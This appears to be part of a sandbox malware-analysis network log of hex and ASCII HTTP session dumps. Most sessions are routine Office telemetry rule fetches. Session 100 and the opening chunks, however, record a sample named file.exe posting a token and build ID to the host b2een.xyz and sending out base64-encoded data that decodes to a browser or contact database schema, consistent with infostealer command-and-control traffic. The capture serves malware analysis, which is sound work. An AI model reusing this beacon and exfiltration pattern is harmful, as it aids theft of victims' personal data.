2024-11-25 10:33:53 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-11-25 10:33:53 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-11-25 10:33:53 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-11-25 10:33:53 UTC	16355	OUT	Data Raw: 76 62 6e 52 68 59 33 52 66 61 57 35 6d 62 79 41 6f 5a 33 56 70 5a 43 42 57 51 56 4a 44 53 45 46 53 49 46 42 53 53 55 31 42 55 6c 6b 67 53 30 56 5a 4c 43 42 31 63 32 56 66 59 32 39 31 62 6e 51 67 53 55 35 55 52 55 64 46 55 69 42 4f 54 31 51 67 54 6c 56 4d 54 43 42 45 52 55 5a 42 56 55 78 55 49 44 41 73 49 48 56 7a 5a 56 39 6b 59 58 52 6c 49 45 6c 4f 56 45 56 48 52 56 49 67 54 6b 39 55 49 45 35 56 54 45 77 67 52 45 56 47 51 56 56 4d 56 43 41 77 4c 43 42 6b 59 58 52 6c 58 32 31 76 5a 47 6c 6d 61 57 56 6b 49 45 6c 4f 56 45 56 48 52 56 49 67 54 6b 39 55 49 45 35 56 54 45 77 67 52 45 56 47 51 56 56 4d 56 43 41 77 4c 43 42 73 59 57 35 6e 64 57 46 6e 5a 56 39 6a 62 32 52 6c 49 46 5a 42 55 6b 4e 49 51 56 49 73 49 47 78 68 59 6d 56 73 49 46 5a 42 55 6b 4e 49 51 56 Data Ascii: vbnRhY3RfaW5mbyAoZ3VpZCBWQVJDSEFSIFBSSU1BUlkgS0VZLCB1c2VfY291bnQgSU5URUdFUiBOT1QgTlVMTCBERUZBVUxUIDAsIHVzZV9kYXRlIElOVEVHRVIgTk9UIE5VTEwgREVGQVVMVCAwLCBkYXRlX21vZGlmaWVkIElOVEVHRVIgTk9UIE5VTEwgREVGQVVMVCAwLCBsYW5ndWFnZV9jb2RlIFZBUkNIQVIsIGxhYmVsIFZBUkNIQV
2024-11-25 10:33:53 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-11-25 10:33:53 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-11-25 10:33:53 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-11-25 10:33:53 UTC	11617	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-11-25 10:33:55 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 25 Nov 2024 10:33:55 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-11-25 10:33:55 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port
96	192.168.2.5	49821	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-25 10:33:53 UTC	192	OUT	GET /rules/rule120682v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-25 10:33:54 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 10:33:53 GMT Content-Type: text/xml Content-Length: 501 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:18 GMT ETag: "0x8DC582BACFDAACD" x-ms-request-id: e6bcc5b6-c01e-0046-7064-3b2db9000000 x-ms-version: 2018-03-28 x-azure-ref: 20241125T103353Z-178bfbc474bq2pr7hC1NYCkfgg00000007bg00000000b12t x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-25 10:33:54 UTC	501	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 41 20 54 3d 22 31 22 20 45 3d 22 54 65 6c 65 6d 65 74 72 79 53 74 61 72 74 75 70 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 31 30 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 33 22 20 47 3d 22 7b 62 31 36 37 36 61 63 33 2d 37 66 65 65 2d 34 34 61 39 2d 39 61 30 65 2d 64 62 62 30 62 34 39 36 65 66 61 35 7d 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120682" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <A T="1" E="TelemetryStartup" /> <R T="2" R="120100" /> <SS T="3" G="{b1676ac3-7fee-44a9-9a0e-dbb0b496efa5}" /> </S> <C T="

Session ID	Source IP	Source Port	Destination IP	Destination Port
97	192.168.2.5	49822	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-25 10:33:53 UTC	193	OUT	GET /rules/rule120602v10s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-25 10:33:54 UTC	494	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 10:33:53 GMT Content-Type: text/xml Content-Length: 2592 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT ETag: "0x8DC582BB5B890DB" x-ms-request-id: def4d052-b01e-0053-1eaf-3ecdf8000000 x-ms-version: 2018-03-28 x-azure-ref: 20241125T103353Z-178bfbc474bgvl54hC1NYCsfuw00000007d0000000001ytm x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-25 10:33:54 UTC	2592	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 32 22 20 56 3d 22 31 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 41 70 70 6c 69 63 61 74 69 6f 6e 41 6e 64 4c 61 6e 67 75 61 67 65 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120602" V="10" DC="SM" EN="Office.System.SystemHealthMetadataApplicationAndLanguage" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa=

Session ID	Source IP	Source Port	Destination IP	Destination Port
98	192.168.2.5	49820	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-25 10:33:53 UTC	192	OUT	GET /rules/rule120681v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-25 10:33:54 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 10:33:54 GMT Content-Type: text/xml Content-Length: 958 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:58 GMT ETag: "0x8DC582BA0A31B3B" x-ms-request-id: 512d0a55-c01e-0079-2cc0-3ee51a000000 x-ms-version: 2018-03-28 x-azure-ref: 20241125T103354Z-15b8b599d88m7pn7hC1TEB4axw00000005tg00000000cn3k x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-25 10:33:54 UTC	958	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 38 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 38 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 33 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120681" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <R T="1" R="120608" /> <R T="2" R="120680" /> <TH T="3"> <O T="AND"> <L> <O T="EQ"> <L>

Session ID	Source IP	Source Port	Destination IP	Destination Port
99	192.168.2.5	49823	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-25 10:33:54 UTC	192	OUT	GET /rules/rule120601v3s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-25 10:33:54 UTC	494	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 10:33:54 GMT Content-Type: text/xml Content-Length: 3342 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:34 GMT ETag: "0x8DC582B927E47E9" x-ms-request-id: 14c1fdaf-501e-0029-4fb8-3ed0b8000000 x-ms-version: 2018-03-28 x-azure-ref: 20241125T103354Z-178bfbc474bp8mkvhC1NYCzqnn000000072g00000000bprx x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-25 10:33:54 UTC	3342	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 31 22 20 56 3d 22 33 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 4f 53 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 44 43 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120601" V="3" DC="SM" EN="Office.System.SystemHealthMetadataOS" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa="DC" xmlns=""> <RI

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
100	192.168.2.5	49825	49.13.32.95	443	6520	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-25 10:33:54 UTC	316	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----CFHCBKKFIJJJECAAFCGI User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6 Host: b2een.xyz Content-Length: 493 Connection: Keep-Alive Cache-Control: no-cache
2024-11-25 10:33:54 UTC	493	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 43 46 48 43 42 4b 4b 46 49 4a 4a 4a 45 43 41 41 46 43 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 64 34 35 36 37 31 63 63 33 31 61 66 37 61 36 39 34 30 64 65 39 35 63 32 33 33 33 32 64 61 33 0d 0a 2d 2d 2d 2d 2d 2d 43 46 48 43 42 4b 4b 46 49 4a 4a 4a 45 43 41 41 46 43 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 39 33 65 34 66 32 64 65 63 31 34 32 38 30 30 39 66 38 62 63 37 35 35 65 38 33 61 32 31 64 31 62 0d 0a 2d 2d 2d 2d 2d 2d 43 46 48 43 42 4b 4b 46 49 4a 4a 4a 45 43 41 41 46 43 47 49 0d 0a 43 6f 6e 74 Data Ascii: ------CFHCBKKFIJJJECAAFCGIContent-Disposition: form-data; name="token"6d45671cc31af7a6940de95c23332da3------CFHCBKKFIJJJECAAFCGIContent-Disposition: form-data; name="build_id"93e4f2dec1428009f8bc755e83a21d1b------CFHCBKKFIJJJECAAFCGICont
2024-11-25 10:33:55 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 25 Nov 2024 10:33:55 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-11-25 10:33:55 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port
101	192.168.2.5	49826	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-25 10:33:56 UTC	193	OUT	GET /rules/rule224901v11s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-25 10:33:56 UTC	494	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 10:33:56 GMT Content-Type: text/xml Content-Length: 2284 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:13 GMT ETag: "0x8DC582BCD58BEEE" x-ms-request-id: 149a8621-501e-0029-28a6-3ed0b8000000 x-ms-version: 2018-03-28 x-azure-ref: 20241125T103356Z-174c587ffdfb485jhC1TEBmc1s00000005m000000000dbtw x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-25 10:33:56 UTC	2284	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 32 32 34 39 30 31 22 20 56 3d 22 31 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 4c 69 63 65 6e 73 69 6e 67 2e 4f 66 66 69 63 65 43 6c 69 65 6e 74 4c 69 63 65 6e 73 69 6e 67 2e 44 6f 4c 69 63 65 6e 73 65 56 61 6c 69 64 61 74 69 6f 6e 22 20 41 54 54 3d 22 63 31 61 30 64 62 30 31 32 37 39 36 34 36 37 34 61 30 64 36 32 66 64 65 35 61 62 30 66 65 36 32 2d 36 65 63 34 61 63 34 35 2d 63 65 62 63 2d 34 66 38 30 2d 61 61 38 33 2d 62 36 62 39 64 33 61 38 36 65 64 37 2d 37 37 31 39 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 43 65 6e 73 75 73 22 20 54 3d 22 55 70 6c 6f 61 64 2d 4d 65 64 69 75 6d 22 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="224901" V="11" DC="SM" EN="Office.Licensing.OfficeClientLicensing.DoLicenseValidation" ATT="c1a0db0127964674a0d62fde5ab0fe62-6ec4ac45-cebc-4f80-aa83-b6b9d3a86ed7-7719" SP="CriticalCensus" T="Upload-Medium"

Session ID	Source IP	Source Port	Destination IP	Destination Port
102	192.168.2.5	49828	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-25 10:33:56 UTC	192	OUT	GET /rules/rule701201v1s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-25 10:33:56 UTC	494	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 10:33:56 GMT Content-Type: text/xml Content-Length: 1393 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:51 GMT ETag: "0x8DC582BE3E55B6E" x-ms-request-id: 259521f4-f01e-003f-28c0-3ed19d000000 x-ms-version: 2018-03-28 x-azure-ref: 20241125T103356Z-178bfbc474brk967hC1NYCfu60000000070g00000000bx4k x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
